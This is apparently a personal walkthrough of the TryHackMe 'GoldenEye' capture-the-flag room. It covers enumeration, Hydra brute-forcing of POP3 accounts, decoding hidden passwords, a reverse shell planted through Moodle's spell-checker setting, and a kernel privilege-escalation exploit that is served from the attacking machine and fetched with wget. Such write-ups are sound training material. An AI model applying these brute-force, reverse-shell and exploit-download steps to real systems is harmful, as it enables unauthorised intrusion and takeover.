CTF Walkthrough | TryHackMe | GoldenEye 👁
Can you root this CMS based vulnerable machine? This CTF will test your enumeration skills and patience. TryHackMe has this amazing box here: https://tryhackme.com/room/goldeneyess. You can always LogIn on TryHackMe, go to rooms → goldeneyess.
Nmap helps me gather information on the open ports. Port 80 and 25 are open ports for now atleast. After visiting the open ports, I found that there is a /sev-home/ where we can go to login! What about the credentials?? I don’t have them.
I decided to go for nmap on all the ports for enumeration. I found these new ports 55006 and 55007 available. SSL port was not working, but the pop3 port is working. I need to target the pop3 port in this CTF.
Before starting the nmap on all the ports, I also used the gobuster to make sure if there was a hidden directory that I could use to get into the machine.
I went again to the port 80 to enumerate on view page source. I have gathered information in previous CTF’s through this function.
After viewing the page source, I found a java script running on the page. I opened the java script in a new tab.
Some start! I found a secret message. More importantly, two users boris and natalya and some encoded password. It took me a while but I could decode the password through HTML Decode. I went to the online decoded and got the password “InvicibleHack3r”, don’t know the user yet!!
After changing the users found in the previous steps, I could login to the website using the username boris and password InvicibleHack3r
I read the message on the webapage and it specifically redirects me to the pop service. It says that all the secret are in the pop service. I used the credentials found in the previous step here to login in the pop service on a non-default port, but it failed.
2. Brute Forcing
I knew where to brute force: pop3 service. I knew users could be either boris or natalya, I need the password to get into the pop3 service.
Hail hydra!! Let’s brute force to get the password for boris to login to the pop3 service.
So one of the important commands that I found was RETR; to get the contents of the email.
Ahaaa!! another user admin found!!
From this account, this is all that we found!! I have another user natalya, let’s check I can brute force in that account.
I did find the credentials for the account.
Same process, login into the service of pop3 and find out information that is stored on the email.
Another user Janus found!
What!! no way. I found the credentials for the
This is not the pop service account, but it looks like it is a internal training account.
I tried to login into the account /sev-home to check if they would let me in. No, they didn’t.
Now, I have to add the domain: severnaya-station.com to my /etc/hosts file since it is written on the email and to access an internal website this is the process that you will have to always follow.
Woop!!Woop!! Got it mate!
User login sucessfull!😂
Enumerating on the user portal, I found there is another user doak!! I found it on the messages that he is giving away his username, just like that. Time to brute force!
Hydra is such a beautiful tool, never disapppointing! I found the credentials for the user doak, its goat!!
Loggin in to the service pop3, username doak and password goat. After logging in, I found the credentials of doak for the internal training website.
Once I logged in the system, I needed to enumerate over the training webpage to find something fruitful to go the next phase of the pentesting.
I found private files on the webpage under the my profile section.
I downloaded the secret text and it directed me to download the .jpg
First, I opened the .jpg with, severnaya-station.com/dir007key/for-007.jpg
I downloaded the file on my kali machine using the wget command.
Additionally, I knew there is something juicy in the .jpg file.
I know the tool stegseek for de-encrypting steganography, unfortunately I did not find anything useful. I wanted to find the password, but it didn’t work out at all.
Remember exiftool?? Oh yes, I used it to find the metadata of the .jpg image. I found image description interesting.
Alternatively, you can also use magic byte to find the information on the meta-data.
When you see a ‘==’ always remember it’s a base64 encoded. I decoded it to find the password for the user admin.
I was enumerating on the webpage to find more information on the user admin. Since I’m the user admin, I can control everything on the webpage. I can make new discussion, new php page, server information, system paths, environment. Most importantly, I found the version of the moodle with admin access.
System paths information will be helpful in getting the reverse shell.
Moodle version 2.2.3
Let’s check f there are any exploits available on the internet for this version of moodle. I did try to use the exploits on the rapid7 and use metasploit, but I did not get the reverse shell.
3. Reverse Shell:
Obtaining a reverse shell through a python one liner seems to be an appropriate step in this CTF. Python one liners can be found https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python
I used a one liner shell in the system path. I’m assuming that python is installed on the server which will give me the reverse shell. I tried using a one liner php reverse shell, but that did not work for this CTF.
Next is what will cause the reverse shell to run?? I could read that when we use the spell checking(aspell) with text editor, it runs a binary and uses it to run the spell checking tool
Python one liner reverse shell with changes in the RHOST== kali machine/attacking machine , RPORT= 9000 (some random port)
I found the plugins section, under that text editor plugin. TinyMCE HTML editor, then change the spell engine to PSpellShell, by default the plugin will be google spell checker.
Since I’m the admin, I started a new discussion topic. I went to the intro section under that news forums. I had to just start a new discussion and call the spell checker to make sure that the reverse shell is invoked. Turn on the port 9000 netcat listner, nc -nlvp 9000
Port 9000 should be turned on before you click the spell checker button and now I have a reverse shell. Well, this is stretching competence.
Now I wanted a tty shell, so I googled it.
Note, in my case the /bin/sh wasn’t working. I changed it to /bin/bash to spawn a tty shell.
I went to the /etc directory to access the passwd file. At the moment, I’m www-data user.
4. Privilege Escalation
I needed to switch to root user, one of the key things is to check the linux version, I checked the version with uname -a. I found the exploit to become root user.
After reading exploit, I made sure that the pre-requisites are fulfilled. I checked for the gcc, but the vulnerable machine doesn’t have the gcc. Alternatively, I found cc which is was available on the vulnerable machine.
I downloaded the exploit from exploit db, saved it on my kali machine. I changed the library call on line 110 from gcc to cc.
I compiled using cc and named the new file as rshell. It gave me some warnings but the compilation was successfull.
python -m SimpleHTTPServer 80 where you have the rshell file so that you can use wget http://<IP of kali machine:80/rshell> to fetch the compiled exploit.
In the vulnerable machine I went to the temp directory, used the wget command and got the malicious file in the temp directory of the vulnerable machine.
Smash the like icon on the bottom, follow and subscribe to my content.
I provided the write access to the exploit, using the chmod 755 rshell.
I ran the file, it used the compiler cc and finally got the reverse shell. Woooop!! Woooop!!
Going to the root folder and finding the contents of the .flag.txt file.
Found the flag and it’s contents, completing the CTF.
Until next one peace✌🏽